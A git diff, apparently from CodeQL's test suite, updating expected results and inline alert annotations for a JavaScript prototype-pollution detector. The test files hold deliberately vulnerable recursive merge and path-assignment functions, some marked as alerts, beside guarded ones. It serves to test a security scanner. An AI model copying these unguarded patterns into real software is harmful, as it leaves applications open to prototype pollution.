tests.js:377:12:377:17 | target | semmle.label | target | +| tests.js:380:22:380:24 | obj | semmle.label | obj | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [src] | semmle.label | callback [src] | +| tests.js:381:14:381:16 | key | semmle.label | key | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [src] | semmle.label | callback [src] | +| tests.js:383:22:383:24 | key | semmle.label | key | +| tests.js:383:27:383:29 | obj | semmle.label | obj | +| tests.js:383:27:383:34 | obj[key] | semmle.label | obj[key] | +| tests.js:383:31:383:33 | key | semmle.label | key | +| tests.js:388:29:388:31 | dst | semmle.label | dst | +| tests.js:388:29:388:31 | dst | semmle.label | dst | +| tests.js:388:34:388:36 | src | semmle.label | src | +| tests.js:389:17:389:19 | src | semmle.label | src | +| tests.js:389:22:389:24 | key | semmle.label | key | +| tests.js:391:32:391:34 | dst | semmle.label | dst | +| tests.js:391:32:391:34 | dst | semmle.label | dst | +| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | +| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | +| tests.js:391:36:391:38 | key | semmle.label | key | +| tests.js:391:42:391:44 | src | semmle.label | src | +| tests.js:391:42:391:49 | src[key] | semmle.label | src[key] | +| tests.js:391:46:391:48 | key | semmle.label | key | +| tests.js:393:13:393:15 | dst | semmle.label | dst | +| tests.js:393:17:393:19 | key | semmle.label | key | +| tests.js:393:24:393:26 | src | semmle.label | src | +| tests.js:393:24:393:31 | src[key] | semmle.label | src[key] | +| tests.js:393:28:393:30 | key | semmle.label | key | +| tests.js:398:30:398:32 | dst | semmle.label | dst | +| tests.js:398:30:398:32 | dst | semmle.label | dst | +| tests.js:398:35:398:37 | src | semmle.label | src | +| tests.js:399:17:399:19 | src | semmle.label | src | +| tests.js:399:23:399:25 | key | semmle.label | key | +| tests.js:399:28:399:32 | value | semmle.label | value | +| tests.js:401:33:401:35 | dst | semmle.label | dst | +| tests.js:401:33:401:35 | dst | semmle.label | dst | +| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | +| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | +| tests.js:401:37:401:39 | key | semmle.label | key | +| tests.js:401:43:401:47 | value | semmle.label | value | +| tests.js:403:13:403:15 | dst | semmle.label | dst | +| tests.js:403:17:403:19 | key | semmle.label | key | +| tests.js:403:24:403:28 | value | semmle.label | value | +| tests.js:408:22:408:24 | obj | semmle.label | obj | +| tests.js:408:27:408:29 | key | semmle.label | key | +| tests.js:409:12:409:14 | obj | semmle.label | obj | +| tests.js:409:12:409:19 | obj[key] | semmle.label | obj[key] | +| tests.js:409:16:409:18 | key | semmle.label | key | +| tests.js:412:31:412:33 | dst | semmle.label | dst | +| tests.js:412:36:412:38 | src | semmle.label | src | +| tests.js:413:14:413:16 | key | semmle.label | key | +| tests.js:414:13:414:41 | value | semmle.label | value | +| tests.js:414:21:414:41 | wrapped ... c, key) | semmle.label | wrapped ... c, key) | +| tests.js:414:33:414:35 | src | semmle.label | src | +| tests.js:414:38:414:40 | key | semmle.label | key | +| tests.js:415:13:415:42 | target | semmle.label | target | +| tests.js:415:22:415:42 | wrapped ... t, key) | semmle.label | wrapped ... t, key) | +| tests.js:415:34:415:36 | dst | semmle.label | dst | +| tests.js:415:39:415:41 | key | semmle.label | key | +| tests.js:417:34:417:39 | target | semmle.label | target | +| tests.js:417:42:417:46 | value | semmle.label | value | +| tests.js:419:13:419:15 | dst | semmle.label | dst | +| tests.js:419:17:419:19 | key | semmle.label | key | +| tests.js:419:24:419:28 | value | semmle.label | value | +| tests.js:424:25:424:27 | obj | semmle.label | obj | +| tests.js:424:30:424:32 | key | semmle.label | key | +| tests.js:426:12:426:14 | obj | semmle.label | obj | +| tests.js:426:12:426:19 | obj[key] | semmle.label | obj[key] | +| tests.js:426:16:426:18 | key | semmle.label | key | +| tests.js:429:34:429:36 | dst | semmle.label | dst | +| tests.js:429:39:429:41 | src | semmle.label | src | +| tests.js:430:14:430:16 | key | semmle.label | key | +| tests.js:431:13:431:44 | value | semmle.label | value | +| tests.js:431:21:431:44 | almostS ... c, key) | semmle.label | almostS ... c, key) | +| tests.js:431:36:431:38 | src | semmle.label | src | +| tests.js:431:41:431:43 | key | semmle.label | key | +| tests.js:432:13:432:45 | target | semmle.label | target | +| tests.js:432:22:432:45 | almostS ... t, key) | semmle.label | almostS ... t, key) | +| tests.js:432:37:432:39 | dst | semmle.label | dst | +| tests.js:432:42:432:44 | key | semmle.label | key | +| tests.js:434:37:434:42 | target | semmle.label | target | +| tests.js:434:45:434:49 | value | semmle.label | value | +| tests.js:436:13:436:15 | dst | semmle.label | dst | +| tests.js:436:17:436:19 | key | semmle.label | key | +| tests.js:436:24:436:28 | value | semmle.label | value | +| tests.js:441:19:441:21 | obj | semmle.label | obj | +| tests.js:443:12:443:14 | obj | semmle.label | obj | +| tests.js:443:12:443:19 | obj[key] | semmle.label | obj[key] | +| tests.js:446:33:446:35 | src | semmle.label | src | +| tests.js:447:14:447:16 | key | semmle.label | key | +| tests.js:448:13:448:38 | value | semmle.label | value | +| tests.js:448:21:448:38 | safeRead(src, key) | semmle.label | safeRead(src, key) | +| tests.js:448:30:448:32 | src | semmle.label | src | +| tests.js:451:39:451:43 | value | semmle.label | value | +| tests.js:453:17:453:19 | key | semmle.label | key | +| tests.js:453:24:453:28 | value | semmle.label | value | +| tests.js:458:26:458:28 | dst | semmle.label | dst | +| tests.js:458:31:458:33 | src | semmle.label | src | +| tests.js:460:12:460:14 | src | semmle.label | src | +| tests.js:460:18:460:22 | value | semmle.label | value | +| tests.js:460:25:460:27 | key | semmle.label | key | +| tests.js:462:29:462:31 | dst | semmle.label | dst | +| tests.js:462:29:462:36 | dst[key] | semmle.label | dst[key] | +| tests.js:462:33:462:35 | key | semmle.label | key | +| tests.js:462:39:462:41 | src | semmle.label | src | +| tests.js:462:39:462:46 | src[key] | semmle.label | src[key] | +| tests.js:462:43:462:45 | key | semmle.label | key | +| tests.js:465:30:465:32 | dst | semmle.label | dst | +| tests.js:465:34:465:36 | key | semmle.label | key | +| tests.js:465:41:465:43 | src | semmle.label | src | +| tests.js:465:41:465:48 | src[key] | semmle.label | src[key] | +| tests.js:465:45:465:47 | key | semmle.label | key | +| tests.js:466:30:466:32 | dst | semmle.label | dst | +| tests.js:466:34:466:36 | key | semmle.label | key | +| tests.js:466:41:466:46 | o[key] | semmle.label | o[key] | +| tests.js:466:43:466:45 | key | semmle.label | key | +| tests.js:467:30:467:32 | dst | semmle.label | dst | +| tests.js:467:34:467:36 | key | semmle.label | key | +| tests.js:467:41:467:45 | value | semmle.label | value | +| tests.js:472:38:472:40 | dst | semmle.label | dst | +| tests.js:473:18:473:22 | value | semmle.label | value | +| tests.js:473:25:473:27 | key | semmle.label | key | +| tests.js:475:41:475:43 | dst | semmle.label | dst | +| tests.js:475:41:475:48 | dst[key] | semmle.label | dst[key] | +| tests.js:475:45:475:47 | key | semmle.label | key | +| tests.js:477:13:477:15 | dst | semmle.label | dst | +| tests.js:477:17:477:19 | key | semmle.label | key | +| tests.js:477:24:477:28 | value | semmle.label | value | +| tests.js:483:26:483:28 | dst | semmle.label | dst | +| tests.js:483:31:483:33 | src | semmle.label | src | +| tests.js:483:31:483:33 | src | semmle.label | src | +| tests.js:484:14:484:16 | key | semmle.label | key | +| tests.js:487:29:487:31 | dst | semmle.label | dst | +| tests.js:487:29:487:36 | dst[key] | semmle.label | dst[key] | +| tests.js:487:33:487:35 | key | semmle.label | key | +| tests.js:487:39:487:41 | src | semmle.label | src | +| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | +| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | +| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | +| tests.js:487:43:487:45 | key | semmle.label | key | +| tests.js:489:13:489:15 | dst | semmle.label | dst | +| tests.js:489:17:489:19 | key | semmle.label | key | +| tests.js:489:24:489:26 | src | semmle.label | src | +| tests.js:489:24:489:31 | src[key] | semmle.label | src[key] | +| tests.js:489:28:489:30 | key | semmle.label | key | +| tests.js:494:32:494:34 | src | semmle.label | src | +| tests.js:495:14:495:16 | key | semmle.label | key | +| tests.js:498:13:498:28 | value | semmle.label | value | +| tests.js:498:13:498:28 | value | semmle.label | value | +| tests.js:498:13:498:28 | value | semmle.label | value | +| tests.js:498:21:498:23 | src | semmle.label | src | +| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | +| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | +| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | +| tests.js:498:25:498:27 | key | semmle.label | key | +| tests.js:500:38:500:42 | value | semmle.label | value | +| tests.js:502:17:502:19 | key | semmle.label | key | +| tests.js:502:24:502:28 | value | semmle.label | value | +| tests.js:508:30:508:32 | dst | semmle.label | dst | +| tests.js:508:35:508:37 | src | semmle.label | src | +| tests.js:511:13:511:25 | key | semmle.label | key | +| tests.js:511:19:511:25 | keys[i] | semmle.label | keys[i] | +| tests.js:513:33:513:35 | dst | semmle.label | dst | +| tests.js:513:33:513:40 | dst[key] | semmle.label | dst[key] | +| tests.js:513:37:513:39 | key | semmle.label | key | +| tests.js:513:43:513:45 | src | semmle.label | src | +| tests.js:513:43:513:50 | src[key] | semmle.label | src[key] | +| tests.js:513:47:513:49 | key | semmle.label | key | +| tests.js:516:32:516:34 | src | semmle.label | src | +| tests.js:516:32:516:39 | src[key] | semmle.label | src[key] | +| tests.js:516:36:516:38 | key | semmle.label | key | +| tests.js:517:35:517:37 | dst | semmle.label | dst | +| tests.js:517:40:517:42 | key | semmle.label | key | +| tests.js:522:35:522:38 | args [0] | semmle.label | args [0] | +| tests.js:522:35:522:38 | args [1] | semmle.label | args [1] | +| tests.js:523:11:523:23 | dst | semmle.label | dst | +| tests.js:523:17:523:20 | args [0] | semmle.label | args [0] | +| tests.js:523:17:523:23 | args[0] | semmle.label | args[0] | +| tests.js:524:11:524:23 | src | semmle.label | src | +| tests.js:524:17:524:20 | args [1] | semmle.label | args [1] | +| tests.js:524:17:524:23 | args[1] | semmle.label | args[1] | +| tests.js:525:14:525:16 | key | semmle.label | key | +| tests.js:527:35:527:37 | dst | semmle.label | dst | +| tests.js:527:35:527:42 | dst[key] | semmle.label | dst[key] | +| tests.js:527:39:527:41 | key | semmle.label | key | +| tests.js:527:45:527:47 | src | semmle.label | src | +| tests.js:527:45:527:52 | src[key] | semmle.label | src[key] | +| tests.js:527:49:527:51 | key | semmle.label | key | +| tests.js:529:13:529:15 | dst | semmle.label | dst | +| tests.js:529:17:529:19 | key | semmle.label | key | +| tests.js:529:24:529:26 | src | semmle.label | src | +| tests.js:529:24:529:31 | src[key] | semmle.label | src[key] | +| tests.js:529:28:529:30 | key | semmle.label | key | +| tests.js:534:31:534:33 | obj | semmle.label | obj | +| tests.js:534:36:534:43 | callback [dst] | semmle.label | callback [dst] | +| tests.js:538:9:538:16 | callback [dst] | semmle.label | callback [dst] | +| tests.js:538:18:538:24 | keys[i] | semmle.label | keys[i] | +| tests.js:538:27:538:29 | obj | semmle.label | obj | +| tests.js:538:27:538:38 | obj[keys[i]] | semmle.label | obj[keys[i]] | +| tests.js:538:31:538:37 | keys[i] | semmle.label | keys[i] | +| tests.js:542:30:542:32 | dst | semmle.label | dst | +| tests.js:542:35:542:37 | src | semmle.label | src | +| tests.js:543:26:543:28 | src | semmle.label | src | +| tests.js:543:32:543:34 | key | semmle.label | key | +| tests.js:543:37:543:41 | value | semmle.label | value | +| tests.js:545:33:545:35 | dst | semmle.label | dst | +| tests.js:545:33:545:40 | dst[key] | semmle.label | dst[key] | +| tests.js:545:37:545:39 | key | semmle.label | key | +| tests.js:545:43:545:47 | value | semmle.label | value | +| tests.js:547:13:547:15 | dst | semmle.label | dst | +| tests.js:547:17:547:19 | key | semmle.label | key | +| tests.js:547:24:547:28 | value | semmle.label | value | +| tests.js:552:35:552:37 | src | semmle.label | src | +| tests.js:553:14:553:16 | key | semmle.label | key | +| tests.js:557:43:557:45 | src | semmle.label | src | +| tests.js:557:43:557:50 | src[key] | semmle.label | src[key] | +| tests.js:559:17:559:19 | key | semmle.label | key | +| tests.js:559:24:559:26 | src | semmle.label | src | +| tests.js:559:24:559:31 | src[key] | semmle.label | src[key] | +| tests.js:559:28:559:30 | key | semmle.label | key | +| tests.js:564:35:564:37 | src | semmle.label | src | +| tests.js:565:14:565:16 | key | semmle.label | key | +| tests.js:569:43:569:45 | src | semmle.label | src | +| tests.js:569:43:569:50 | src[key] | semmle.label | src[key] | +| tests.js:571:17:571:19 | key | semmle.label | key | +| tests.js:571:24:571:26 | src | semmle.label | src | +| tests.js:571:24:571:31 | src[key] | semmle.label | src[key] | +| tests.js:571:28:571:30 | key | semmle.label | key | +| tests.js:576:30:576:32 | src | semmle.label | src | +| tests.js:577:14:577:16 | key | semmle.label | key | +| tests.js:580:38:580:40 | src | semmle.label | src | +| tests.js:580:38:580:45 | src[key] | semmle.label | src[key] | +| tests.js:582:17:582:19 | key | semmle.label | key | +| tests.js:582:24:582:26 | src | semmle.label | src | +| tests.js:582:24:582:31 | src[key] | semmle.label | src[key] | +| tests.js:582:28:582:30 | key | semmle.label | key | +| tests.js:591:25:591:27 | obj | semmle.label | obj | +| tests.js:592:7:592:9 | obj | semmle.label | obj | +| tests.js:592:21:592:23 | obj | semmle.label | obj | +| tests.js:593:10:593:12 | obj | semmle.label | obj | +| tests.js:600:31:600:34 | dest | semmle.label | dest | +| tests.js:600:37:600:42 | source | semmle.label | source | +| tests.js:601:16:601:18 | key | semmle.label | key | +| tests.js:603:34:603:37 | dest | semmle.label | dest | +| tests.js:603:34:603:42 | dest[key] | semmle.label | dest[key] | +| tests.js:603:39:603:41 | key | semmle.label | key | +| tests.js:603:45:603:50 | source | semmle.label | source | +| tests.js:603:45:603:55 | source[key] | semmle.label | source[key] | +| tests.js:603:52:603:54 | key | semmle.label | key | +| tests.js:605:13:605:16 | dest | semmle.label | dest | +| tests.js:605:18:605:20 | key | semmle.label | key | +| tests.js:605:25:605:51 | capture ... e[key]) | semmle.label | capture ... e[key]) | +| tests.js:605:40:605:45 | source | semmle.label | source | +| tests.js:605:40:605:50 | source[key] | semmle.label | source[key] | +| tests.js:605:47:605:49 | key | semmle.label | key | subpaths | tests.js:355:53:355:63 | target[key] | tests.js:348:32:348:37 | target | tests.js:361:12:361:17 | target | tests.js:355:31:355:86 | mergePl ... ptions) | | tests.js:371:62:371:72 | target[key] | tests.js:364:41:364:46 | target | tests.js:377:12:377:17 | target | tests.js:371:31:371:95 | mergePl ... ptions) | @@ -1381,36 +1414,3 @@ subpaths | tests.js:432:42:432:44 | key | tests.js:424:30:424:32 | key | tests.js:426:12:426:19 | obj[key] | tests.js:432:22:432:45 | almostS ... t, key) | | tests.js:448:30:448:32 | src | tests.js:441:19:441:21 | obj | tests.js:443:12:443:19 | obj[key] | tests.js:448:21:448:38 | safeRead(src, key) | | tests.js:605:40:605:50 | source[key] | tests.js:591:25:591:27 | obj | tests.js:593:10:593:12 | obj | tests.js:605:25:605:51 | capture ... e[key]) | -#select -| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | examples/PrototypePollutingFunction.js:2:14:2:16 | key | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | examples/PrototypePollutingFunction.js:2:21:2:23 | src | src | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | dst | -| path-assignment.js:15:13:15:18 | target | path-assignment.js:8:19:8:25 | keys[i] | path-assignment.js:15:13:15:18 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:8:19:8:25 | keys[i] | here | path-assignment.js:15:13:15:18 | target | target | -| path-assignment.js:44:5:44:10 | target | path-assignment.js:41:19:41:25 | keys[i] | path-assignment.js:44:5:44:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:41:19:41:25 | keys[i] | here | path-assignment.js:44:5:44:10 | target | target | -| path-assignment.js:61:5:61:10 | target | path-assignment.js:58:19:58:25 | keys[i] | path-assignment.js:61:5:61:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:58:19:58:25 | keys[i] | here | path-assignment.js:61:5:61:10 | target | target | -| path-assignment.js:71:5:71:10 | target | path-assignment.js:68:19:68:25 | keys[i] | path-assignment.js:71:5:71:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:68:19:68:25 | keys[i] | here | path-assignment.js:71:5:71:10 | target | target | -| tests.js:8:13:8:15 | dst | tests.js:4:14:4:16 | key | tests.js:8:13:8:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:4:21:4:23 | src | src | tests.js:8:13:8:15 | dst | dst | -| tests.js:18:13:18:15 | dst | tests.js:14:30:14:32 | key | tests.js:18:13:18:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:14:17:14:19 | src | src | tests.js:18:13:18:15 | dst | dst | -| tests.js:36:9:36:11 | dst | tests.js:25:18:25:20 | key | tests.js:36:9:36:11 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:25:25:25:30 | source | source | tests.js:36:9:36:11 | dst | dst | -| tests.js:46:13:46:15 | dst | tests.js:41:14:41:16 | key | tests.js:46:13:46:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:41:21:41:23 | src | src | tests.js:46:13:46:15 | dst | dst | -| tests.js:57:13:57:15 | dst | tests.js:52:14:52:16 | key | tests.js:57:13:57:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:52:21:52:23 | src | src | tests.js:57:13:57:15 | dst | dst | -| tests.js:109:13:109:15 | dst | tests.js:102:14:102:16 | key | tests.js:109:13:109:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:102:21:102:23 | src | src | tests.js:109:13:109:15 | dst | dst | -| tests.js:154:13:154:15 | dst | tests.js:150:14:150:16 | key | tests.js:154:13:154:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:150:21:150:23 | src | src | tests.js:154:13:154:15 | dst | dst | -| tests.js:196:13:196:15 | dst | tests.js:192:19:192:25 | keys[i] | tests.js:196:13:196:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:190:28:190:30 | src | src | tests.js:196:13:196:15 | dst | dst | -| tests.js:233:5:233:13 | map[key1] | tests.js:238:14:238:16 | key | tests.js:233:5:233:13 | map[key1] | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:238:21:238:24 | data | data | tests.js:233:5:233:13 | map[key1] | here | -| tests.js:270:13:270:15 | dst | tests.js:265:19:265:26 | entry[0] | tests.js:270:13:270:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:264:20:264:22 | src | src | tests.js:270:13:270:15 | dst | dst | -| tests.js:280:13:280:15 | dst | tests.js:276:34:276:36 | key | tests.js:280:13:280:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:276:21:276:23 | src | src | tests.js:280:13:280:15 | dst | dst | -| tests.js:308:17:308:19 | dst | tests.js:302:14:302:16 | key | tests.js:308:17:308:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:302:21:302:23 | src | src | tests.js:308:17:308:19 | dst | dst | -| tests.js:322:17:322:19 | dst | tests.js:315:14:315:16 | key | tests.js:322:17:322:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:315:21:315:23 | src | src | tests.js:322:17:322:19 | dst | dst | -| tests.js:338:17:338:19 | dst | tests.js:329:14:329:16 | key | tests.js:338:17:338:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:329:21:329:23 | src | src | tests.js:338:17:338:19 | dst | dst | -| tests.js:357:17:357:22 | target | tests.js:350:37:350:39 | key | tests.js:357:17:357:22 | target | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:350:21:350:26 | source | source | tests.js:357:17:357:22 | target | target | -| tests.js:403:13:403:15 | dst | tests.js:381:14:381:16 | key | tests.js:403:13:403:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:381:21:381:23 | obj | obj | tests.js:403:13:403:15 | dst | dst | -| tests.js:419:13:419:15 | dst | tests.js:413:14:413:16 | key | tests.js:419:13:419:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:413:21:413:23 | src | src | tests.js:419:13:419:15 | dst | dst | -| tests.js:436:13:436:15 | dst | tests.js:430:14:430:16 | key | tests.js:436:13:436:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:430:21:430:23 | src | src | tests.js:436:13:436:15 | dst | dst | -| tests.js:465:30:465:32 | dst | tests.js:460:25:460:27 | key | tests.js:465:30:465:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:465:30:465:32 | dst | dst | -| tests.js:466:30:466:32 | dst | tests.js:460:25:460:27 | key | tests.js:466:30:466:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:466:30:466:32 | dst | dst | -| tests.js:467:30:467:32 | dst | tests.js:460:25:460:27 | key | tests.js:467:30:467:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:467:30:467:32 | dst | dst | -| tests.js:477:13:477:15 | dst | tests.js:473:25:473:27 | key | tests.js:477:13:477:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:473:12:473:14 | src | src | tests.js:477:13:477:15 | dst | dst | -| tests.js:489:13:489:15 | dst | tests.js:484:14:484:16 | key | tests.js:489:13:489:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:484:21:484:23 | src | src | tests.js:489:13:489:15 | dst | dst | -| tests.js:517:35:517:37 | dst | tests.js:511:19:511:25 | keys[i] | tests.js:517:35:517:37 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:509:28:509:30 | src | src | tests.js:517:35:517:37 | dst | dst | -| tests.js:529:13:529:15 | dst | tests.js:525:14:525:16 | key | tests.js:529:13:529:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:525:21:525:23 | src | src | tests.js:529:13:529:15 | dst | dst | -| tests.js:547:13:547:15 | dst | tests.js:538:18:538:24 | keys[i] | tests.js:547:13:547:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:535:30:535:32 | obj | obj | tests.js:547:13:547:15 | dst | dst | -| tests.js:605:13:605:16 | dest | tests.js:601:16:601:18 | key | tests.js:605:13:605:16 | dest | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:601:35:601:40 | source | source | tests.js:605:13:605:16 | dest | dest | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref index 972db5adb99d..ec5ea34d9eb1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref @@ -1 +1,2 @@ -Security/CWE-915/PrototypePollutingFunction.ql \ No newline at end of file +query: Security/CWE-915/PrototypePollutingFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js index 1953ba57f00b..ef5ba9691fec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js @@ -1,10 +1,10 @@ function merge(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (!src.hasOwnProperty(key)) continue; if (isObject(dst[key])) { merge(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js index c7285a3ac1bd..14d7a4e65196 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js @@ -5,14 +5,14 @@ function isSafe(key) { function assignToPath(target, path, value) { let keys = path.split('.'); for (let i = 0; i < keys.length; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source if (i < keys.length - 1) { if (!target[key]) { target[key] = {}; } target = target[key]; } else { - target[key] = value; // NOT OK + target[key] = value; // $ Alert } } } @@ -28,7 +28,7 @@ function assignToPathSafe(target, path, value) { } target = target[key]; } else { - target[key] = value; // OK + target[key] = value; } } } @@ -38,10 +38,10 @@ function assignToPathAfterLoop(target, path, value) { let keys = path.split('.'); let i; for (i = 0; i < keys.length - 1; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function splitHelper(path, sep) { @@ -55,18 +55,18 @@ function assignToPathWithHelper(target, path, value, sep) { let keys = splitHelper(path, sep) let i; for (i = 0; i < keys.length - 1; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function spltOnRegexp(target, path, value) { let keys = path.split(/\./); let i; for (i = 0; i < keys.length - 1; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index 14a0a19fb626..dcce195526ac 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -1,28 +1,28 @@ import dummy from 'somewhere'; function copyUsingForIn(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (dst[key]) { copyUsingForIn(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } function copyUsingKeys(dst, src) { - Object.keys(src).forEach(key => { + Object.keys(src).forEach(key => { // $ Source if (dst[key]) { copyUsingKeys(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } function copyRest(dst, ...sources) { for (let source of sources) { - for (let key in source) { + for (let key in source) { // $ Source copyRestAux(dst, source[key], key); } } @@ -33,28 +33,28 @@ function copyRestAux(dst, value, key) { if (dstValue) { copyRest(dstValue, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } function copyProtoGuarded(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (key === "__proto__") continue; if (dst[key]) { copyProtoGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } function copyCtorGuarded(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (key === "constructor") continue; if (dst[key]) { copyCtorGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -65,7 +65,7 @@ function copyDoubleGuarded(dst, src) { if (dst[key]) { copyDoubleGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -80,7 +80,7 @@ function copyComplex(dst, src) { if (dst[key]) { copyComplex(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -93,20 +93,20 @@ function copyHasOwnProperty(dst, src) { if (dst.hasOwnProperty(key)) { copyHasOwnProperty(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function copyHasOwnPropertyBad(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source // Guarding using src.hasOwnProperty is *not* effective, // since '__proto__' and 'constructor' are own properties in the payload. if (!src.hasOwnProperty(key)) continue; // Not safe if (dst[key]) { copyHasOwnPropertyBad(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -118,21 +118,21 @@ function copyHasOwnPropertyTearOff(dst, src) { if (_hasOwnProp.call(dst, key)) { copyHasOwnPropertyTearOff(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function shallowExtend(dst, src) { for (let key in src) { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } function transform(src, fn) { if (typeof src !== 'object') return fn(src); for (let key in src) { - src[key] = transform(src[key], fn); // OK + src[key] = 